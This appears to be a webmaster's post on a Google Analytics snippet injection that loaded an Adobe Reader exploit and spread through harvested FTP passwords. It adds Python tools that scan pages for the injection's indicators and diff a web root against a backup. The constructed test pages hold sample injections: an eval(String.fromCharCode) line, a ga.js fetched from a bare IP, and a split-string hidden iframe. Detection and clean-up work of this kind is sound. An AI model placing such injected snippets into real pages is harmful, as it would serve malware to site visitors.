This post is a summary of several threads and resources about this exploit.
Have you been infected?
- Visit your site's home page
- View the page source
- If the typical Google Analytics script code block contains a string of weird characters, your site has been infected
(a similar variant injects an IFRAME instead: look in your source for something like document.write("<"+"i"+"f"+"ram"+"e"..., which assembles the IFRAME tag from string fragments so that a plain search for "iframe" does not find it; the IFRAME references a site named "trughtsa.com")
The exploit works as follows:
- the reference to http://www.google-analytics.com/ga.js in the page is rewritten by the regex to
- which runs http://18.104.22.168/image/pfgt.php
- this executes an Adobe Reader exploit (BID 27641 and BID 34169; Symantec calls it Bloodhound.Exploit.196)
- files with typical names such as login, index, default or home, with PHP, ASP or HTML extensions, are targeted
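Turning the "Have you been infected?" checks and the indicators from the exploit description into a script, as an added example (not code from the original post): it first collapses split string literals so that "<"+"i"+"f"+"ram"+"e" becomes "<iframe" before any matching, then flags a Google Analytics block containing escape runs, String.fromCharCode or eval() (my heuristic for the "weird characters", not a signature of the real payload), a ga.js loaded from a host other than google-analytics.com, any src pointing at a bare IP address, the trughtsa.com domain named above, and restricts the tree scan to the login/index/default/home file names the post lists. The sample pages, the 198.51.100.7 address and the eval() line are constructed for illustration.

```python
"""Scan web pages for the injection indicators described in the post.

Added example, not the post's own code. Assumptions (mine): the stock
Google Analytics snippet never contains runs of \\xNN/\\uNNNN escapes,
String.fromCharCode or eval(), so those inside a GA <script> block are
treated as the "weird characters"; a ga.js served from outside
google-analytics.com or any src= pointing at a bare IP is suspicious.
"""
from __future__ import annotations
import re
from pathlib import Path

TARGET_STEMS = {"login", "index", "default", "home"}  # names the post lists
TARGET_EXTS = {".php", ".asp", ".html", ".htm"}      # extensions the post lists
KNOWN_BAD_HOSTS = {"trughtsa.com"}                    # domain named in the post

_DQ = r'"[^"\n]*"'
_SQ = r"'[^'\n]*'"
_LITERAL = f"(?:{_DQ}|{_SQ})"
# Two or more string literals glued with '+', e.g. "<"+"i"+"f"+"ram"+"e"
_CONCAT = re.compile(rf"{_LITERAL}(?:\s*\+\s*{_LITERAL})+")
_SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
_GA_MENTION = re.compile(r"google-analytics|_gat\.|gaJsHost|ga\.js", re.I)
_WEIRD = re.compile(               # heuristic markers, see module docstring
    r"(?:\\x[0-9a-fA-F]{2}){4,}"   # \x64\x6f\x63...
    r"|(?:\\u[0-9a-fA-F]{4}){4,}"  # \u0064\u006f...
    r"|String\.fromCharCode\s*\("
    r"|\beval\s*\("
)
_GA_JS_URL = re.compile(r"https?://([a-z0-9.-]+)/ga\.js", re.I)
_BARE_IP_SRC = re.compile(r"""src\s*=\s*["']?https?://\d{1,3}(?:\.\d{1,3}){3}[/"'\s>]""", re.I)
_IFRAME_WRITE = re.compile(r"""document\.write\s*\(\s*["']\s*<iframe""", re.I)


def join_concatenated_literals(js: str) -> str:
    """Collapse "<"+"i"+"frame" into "<iframe" so split-string obfuscation
    cannot hide a keyword from a plain substring search."""
    def _join(m: re.Match) -> str:
        pieces = [lit[1:-1] for lit in re.findall(_LITERAL, m.group(0))]
        return '"' + "".join(pieces) + '"'
    return _CONCAT.sub(_join, js)


def scan_text(page: str) -> list[str]:
    """Return the indicators found in one page; an empty list means clean."""
    text = join_concatenated_literals(page)
    findings = []
    for block in _SCRIPT_BLOCK.findall(text):
        if _GA_MENTION.search(block) and _WEIRD.search(block):
            findings.append("obfuscated code inside Google Analytics block")
            break
    for host in _GA_JS_URL.findall(text):
        h = host.lower()
        if h != "google-analytics.com" and not h.endswith(".google-analytics.com"):
            findings.append(f"ga.js loaded from unexpected host {host}")
    if _BARE_IP_SRC.search(text):
        findings.append("script/iframe src points at a bare IP address")
    if _IFRAME_WRITE.search(text):
        findings.append("iframe built with document.write from split strings")
    for host in sorted(KNOWN_BAD_HOSTS):
        if host in text.lower():
            findings.append(f"reference to known bad host {host}")
    return findings


def is_target_file(path) -> bool:
    """True for the file names/extensions the post says are targeted."""
    p = Path(path)
    return p.stem.lower() in TARGET_STEMS and p.suffix.lower() in TARGET_EXTS


def scan_tree(root, only_targets: bool = True) -> dict[str, list[str]]:
    """Scan a web root; rglob does not skip dot-files, so hidden files are covered."""
    root, hits = Path(root), {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and (not only_targets or is_target_file(p)):
            findings = scan_text(p.read_text(errors="replace"))
            if findings:
                hits[p.relative_to(root).as_posix()] = findings
    return hits


# Constructed samples, not captured from a real site.
CLEAN_PAGE = """<html><body>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-00000-0");
pageTracker._trackPageview();
</script>
</body></html>"""
# GA block padded with obfuscated code, plus ga.js pulled from a bare IP (198.51.100.7 is a documentation address).
INFECTED_GA_PAGE = CLEAN_PAGE.replace(
    "pageTracker._trackPageview();",
    "pageTracker._trackPageview();\neval(String.fromCharCode(100,111,99,117,109,101,110,116));",
).replace("</body>", '<script src="http://198.51.100.7/ga.js"></script>\n</body>')
# The IFRAME variant: tag assembled from string fragments.
INFECTED_IFRAME_PAGE = CLEAN_PAGE.replace(
    "</body>",
    "<script>document.write(\"<\"+\"i\"+\"f\"+\"ram\"+\"e\"+\" src='http://trughtsa.com/in.php' width=1 height=1></iframe>\");</script>\n</body>",
)

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("ga", INFECTED_GA_PAGE), ("iframe", INFECTED_IFRAME_PAGE)]:
        print(name, scan_text(page) or "clean")
```

Run scan_tree() against a copy of your web root (with only_targets=False to cover every file). The literal-joining step is a regex approximation rather than a JavaScript parser, so treat its output as a shortlist to inspect by hand, not a verdict.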
The injection
Some accounts report as much as 25% of Joomla forum posts (Joomla is a popular platform running on Apache servers with PHP) being about this, and several other threads discuss similar issues. The reality: the injection exploits weak security settings on Apache HTTP servers and unencrypted FTP passwords saved by popular website editing tools. Once a client machine is infected, the saved passwords of all commonly used tools are harvested to collect more FTP credentials, which are then used to spread the attack further.
Is it a Google Analytics exploit: Yes, in the sense that the injected code targets the Google Analytics snippet in your own pages; it is the snippet in your files that gets rewritten, not anything on Google's side.
The fact that Google Analytics is so widely used, and that its script code block is always identical (which makes it trivial to match with a regex), certainly made it a target of choice for this exploit.
Closing the door
Google suggests looking at these resources:
- My Site's Been Hacked, Now What?
- Best Practices Against Hacking
- Quick Security Checklist for Webmasters
- Start with your own computer, since the FTP passwords were harvested from infected client machines: scan it with anti-virus and anti-spyware tools.
- Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
- Make sure you have the latest Adobe Reader, since the payload is an Adobe Reader exploit.
- Now keep the new passwords secure. Don't use the auto-upload (saved password) features of your website editors; enter the password every time you upload new content instead. Use SFTP instead of FTP if possible.
- Now remove the malicious code (the IFRAMEs and the regex-injected script) from your files on the server. The easiest way is to upload clean content from a backup.
- Scan your server directories for any new or suspicious files (don't forget to check hidden files). Remove anything that should not be there.
- If your site was flagged by Google, request a malware review via Webmaster Tools.
- Regularly check your site with diagnostic tools of your choice.
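For the two clean-up steps above (restore clean content from a backup, then look for new or hidden files), an added example that is not from the original post: it hashes every file under the live web root and under a known-clean backup and reports what is new, modified or missing, treating dot-files such as .htaccess like any other file so hidden drops are not skipped. It assumes both trees are readable locally (for example the backup unpacked beside a copy of the live site); the two small trees the demo builds are constructed.

```python
"""Diff a live web root against a known-clean backup by content hash.

Added example, not the post's own code. Assumes the backup predates
the infection and that both trees are available on local disk.
"""
from __future__ import annotations
import hashlib
from pathlib import Path


def digest_tree(root: Path) -> dict[str, str]:
    """Map relative POSIX path -> SHA-256 of every regular file under root.
    Path.rglob('*') does not skip dot-files, so .htaccess and friends are included."""
    digests = {}
    for p in root.rglob("*"):
        if p.is_file():
            digests[p.relative_to(root).as_posix()] = hashlib.sha256(p.read_bytes()).hexdigest()
    return digests


def compare_trees(live: Path, backup: Path) -> dict[str, list[str]]:
    """Classify files as new (only in live), modified (hash differs), missing
    (only in backup); 'hidden' lists the new files living under a dot-name."""
    live_d, back_d = digest_tree(live), digest_tree(backup)
    new = sorted(set(live_d) - set(back_d))
    return {
        "new": new,
        "modified": sorted(k for k in live_d.keys() & back_d.keys() if live_d[k] != back_d[k]),
        "missing": sorted(set(back_d) - set(live_d)),
        "hidden": [k for k in new if any(part.startswith(".") for part in k.split("/"))],
    }


def demo() -> dict[str, list[str]]:
    """Build two small constructed trees in a temp directory and compare them."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        backup, live = Path(tmp, "backup"), Path(tmp, "live")
        for root in (backup, live):
            (root / "img").mkdir(parents=True)
            (root / "index.php").write_text("<?php include 'site.php'; ?>\n")
            (root / "img" / "logo.gif").write_bytes(b"GIF89a")
        (backup / "contact.html").write_text("<html></html>\n")
        # Constructed changes on the live side: injected script, new dot-file, dropped file.
        (live / "index.php").write_text(
            "<?php include 'site.php'; ?>\n<script>document.write(\"<\"+\"iframe\")</script>\n"
        )
        (live / ".htaccess").write_text("RewriteEngine On\n")
        (live / "img" / "upload.php").write_text("<?php /* not in the backup */ ?>\n")
        return compare_trees(live, backup)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s} {paths}")
```

Everything under "new" and "hidden" is a candidate for deletion, everything under "modified" is a candidate for overwriting from the backup, and "missing" tells you whether the backup is older than the content you want to keep.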